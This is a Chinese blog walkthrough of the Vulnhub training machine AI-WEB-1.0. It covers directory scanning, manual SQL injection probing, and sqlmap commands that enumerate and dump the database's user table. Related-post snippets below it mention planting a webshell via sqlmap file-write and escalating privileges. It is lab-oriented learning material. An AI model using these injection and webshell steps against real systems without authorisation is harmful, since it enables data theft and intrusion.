Vulnhub靶机:AI-WEB-1.0

已于 2024-08-20 16:32:52 修改
阅读量364 收藏 4
点赞数 3
文章标签: 前端
于 2024-08-19 20:30:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58771233/article/details/141334092
版权

一.先访问网页

二 . 对网站进行文件和目录扫描

出现robots.txt

三.进入网站查询

访问发现/m3diNg0/没有权限

访问发现/se3reTdir777/目录可以访问成功

四.使用dirb进行扫描

dirb http://172.16.1.88/m3diNf0/
dirb http://172.16.1.88/se3reTdir777/

扫描发现到172.16.1.88/m3diNf0/有一个info.php页面

尝试访问

五.发现是页面查询,考虑sql注入

输入一个1试试

返回成功

返回成功

返回成功

当我们输入id为4时,返回失败了,查询结果为无
我们可以从数据库中知道一共有三个用户

尝试使用单引号结果报错(1')

产生报错,报错原因是单引号末闭合
再加一个单引号,两个单引号刚好构成闭合,如果返回正常的话则存在sql注入漏洞

可以看到正常返回了id为1的结果,存在注入
使用sqlmap进行注入攻击:
由于是post数据包,我们需要打开BP进行抓包,将数据包进行复制,存储到txt中进行sqlmap测试

六.使用sqlmap扫描

查看当前服务下所有数据库

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

查看当前数据库下所有表

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

判断User表下字段名称

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

将id表中数据dump下来

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

小黄鼠狼
关注
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4259
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1620
vulnhub靶机AI-Web-1.0渗透笔记
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 1059
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
VulnHub 靶机系列之AI-Web-1.0
2302_76838247的博客
09-10 1575
kali机下载地址(选择第一个下载,3G大小。
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 335
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
Vulnhub靶机AI-WEB-1.0渗透骚操作(超详细讲解教程)
weixin_67832625的博客
07-27 421
超详细的靶场讲解,适合小白入门到提权的操作,本文介绍了从主机发现,端口扫描,发现sql注入进行漏洞利用,开启服务到提权的文章。
记录一次vulnhubAI-WEB-1.0靶场复现
sszsNo1的博客
06-24 255
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 752
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1471
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6679
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
AI-Web-1.0靶场
qq_46187131的博客
03-27 1390
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
day01
JiangMeiXue的博客
09-25 205
目录。
webview2加载本地页面
qq_25160759的博客
09-23 647
推荐使用这种方式,加载速度比WebResourceRequested快(实测的确是快点),但是需要支持:ICoreWebView2_3。个人测试加载html字符串,对于html中引入了css和js,加载不太友好。这种方式是通过截获网络请求,然后返回需要的数据。以达到成功请求的假象。
前端面试经验总结2(经典问题篇)
最新发布
rita_0567的博客
09-28 628
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
基于webComponents的纯原生前端框架
u013776700的博客
09-28 103
采用artComponent模板引擎,在数据更新后实现UI更新,当然这里做了优化处理,尽量减小页面渲染受影响的范围,实现最小化更新。基于框架,开发了一套常用UI组件,提升开发速度。组件库采用开放原则,也就是说别人都可以使用我的开发接口去开发组件库。我本人的个人开发web前端前框架xui,正在开发中,业已完成50%的核心开发工作,并且在开发过程中逐渐完善.目前框架未采用任何和市面上框架模式,没有打包过程,实现真实的开箱即用。框架完成了事件触发和事件监听的封装,在页面和组件事件处理上更加方便。
apply、call和bind的作用和区别
欢迎来到我的博客!我是一名全栈开发工程师,主攻前端开发。希望通过我的博客,能够与大家共同学习和成长。感谢您的关注和支持!
09-23 715
javascript中,apply、call和bind的作用和区别介绍。
grpcweb 客户端请求grpc-java服务器
nddjava的专栏
09-24 395
1. 定义grpc proto文件:HelloWorld.proto。5.grpc-web代理:nginx。3. grpc-web js生成。2. java grpc服务。4. grpc-web代码。
VulnHub入门教程:DC-1靶场攻破指南
靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux 命令行以及基本的渗透测试工具使用经验,如 Kali Linux 或 Parrot Security OS 上的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值